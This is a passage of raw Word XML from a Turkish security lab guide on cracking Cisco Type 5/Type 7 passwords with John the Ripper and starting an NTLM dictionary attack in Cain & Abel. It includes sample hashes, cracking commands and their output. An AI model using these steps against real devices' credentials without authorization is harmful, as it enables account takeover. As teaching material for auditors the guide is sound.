      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EF5A555" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30D4ACE2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69F92F71" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-L ile denenecek kullanıcı adları bir listeden verilir. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179DFDFC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-P ile denenecek parolaları bir listeden verilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232570A9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E5FBB24" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699B334F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00902B70">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="020C58CF" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc430104858"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5.3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:t>Cisco Type 5 Parolalarının JTR</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF186A">
        <w:t>(John The Ripper)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:t xml:space="preserve"> Kullanılarak Kırılması</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="2EB7C163" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A82B1AE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Açıklama: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E75253" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cisco ağ cihazlarında iki tip parola vardır. Bunlar Type 7 ve type 5 parola tipleridir.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="0B58078E" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5F4E2C7E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>enable secret 5 $1$0a4m$jsbSzU.vytsZFISdJtbQI4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="550DBEA8" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>enable password 7 062E0A1B76411F2D5C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B2681DE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F50ECBB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Type 7 kolaca “çözülebilir” bir algoritma kullanmaktadır. Internet üzerinden edinilecek çeşitli araçlarla type7 parolaları rahatlıkla çözülebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E96758E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00C37FB0">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.ibeast.com/content/tools/CiscoPassword/index.asp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="more"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Type 5(enable secret), parolayı md5+salt kullanarak saklamaktadır. Örnek  olarak FreeBSD parola tipi alınmıştır. Dolayısıyla JTR’in Cisco parolalarını kırması için herhangi bir ek yama gerektirmez.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Uygulama:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Örnek Cisco type 5 parolası:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$1$WhZT$YYEI3f0wwWJGAXtAayK/Q.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D28CE8E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu parolayı cisco_type5 adlı bir dosyaya ekleyerek aşağıdaki komutla kırma işlemi başlatılabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="12FB2F22" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="51891519" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t># ./john cisco_type5</w:t>
            </w:r>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>Loaded 1 password hash (FreeBSD MD5 [32/32])</w:t>
            </w:r>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>test              ?</w:t>
            </w:r>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>guesses: 1  time: 0:00:00:02 100.00% (2) (ETA: Thu Nov 25</w:t>
            </w:r>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>03:40:51 2010)  c/s: 7116  trying: test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="494BF707" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Burada seçilen parola basit olduğu için kolaylıkla kırılmıştır. Parolanın daha zor olduğu durumlarda JTR’in ileri seviye özellikleri kullanılması gerekebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0250B2EB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mesela kırılmak istenen parolanın  JTR’in varsayılan sözlük listesinde olmadığı varsayılsın. Bu durumda ya kaba kuvvet denemesi(brute force) ya da sözlük saldırısı denemesi gerçekleştirilebilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Kaba kuvvet parola saldırısı çok uzun süreceği için sözlük yöntemi tercih edilecektir. JTR’a sözlük kullanmasını  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-w:dosya_adi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> parametresiyle aktarabiliriz.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w14:paraId="4CC3673C" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6CECA002" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t># ./john</w:t>
            </w:r>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>-w:son_wordlist_turkce cisco_type5_test</w:t>
            </w:r>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>Loaded 1 password hash (FreeBSD MD5 [32/32])</w:t>
            </w:r>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>guesses: 0  time: 0:00:00:04 3.48% (ETA: Thu Nov 25 03:53:43</w:t>
            </w:r>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>2010)  c/s: 7353  trying: ow8</w:t>
            </w:r>
            <w:r w:rsidRPr="00C37FB0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>deneme        (bga)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F5C58F6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14CDD25A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Çıktıdan görüleceği gibi JTR’in md5+salt değeri kullanılan parola formatlarına karşı hızı çok yüksek değil(saniyede ~7500 deneme). Bunun temel nedeni sözlük listesindeki her bir satırı alıp öncelikle hash oluşturup sonra varolan hash değeriyle karşılaştırmasıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370B7946" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Oysa burada rainbowtable kullanabilseydi, bu işlem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sadece birkaç saniye sürecekti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E383D35" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E90FEBB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B893C06" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00147513" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc430104859"/>
      <w:r w:rsidRPr="00147513">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5.4. Cain&amp;Abel </w:t>
      </w:r>
      <w:r>
        <w:t>Aracı i</w:t>
      </w:r>
      <w:r w:rsidRPr="00147513">
        <w:t>le Parola Kırmak</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="00147513">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD0A831" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D13CF1" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanılan Araçlar: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231B9490" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cain&amp;Abel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741F15D3" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="679544B9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adımlar: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647A5DD3" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows NTLM parolası sözlük saldırısı (Dictionary Attack) ile kırılacaktır. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456E41B7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cain &amp; Abel aracı çalıştırılarak Cracker menüsü seçilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DBF00F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00F340F8" wp14:editId="0F10201F">
            <wp:extent cx="5760720" cy="3035338"/>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5338"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D953C79" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="413DE3AB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Yerel sistemde bulunan hash değerini sisteme tanıtmak için, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Artı (+) işaretine basılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E53FEAB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78ACF750" wp14:editId="1E98AA4B">
            <wp:extent cx="5760720" cy="3049668"/>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49668"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="775DE75F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
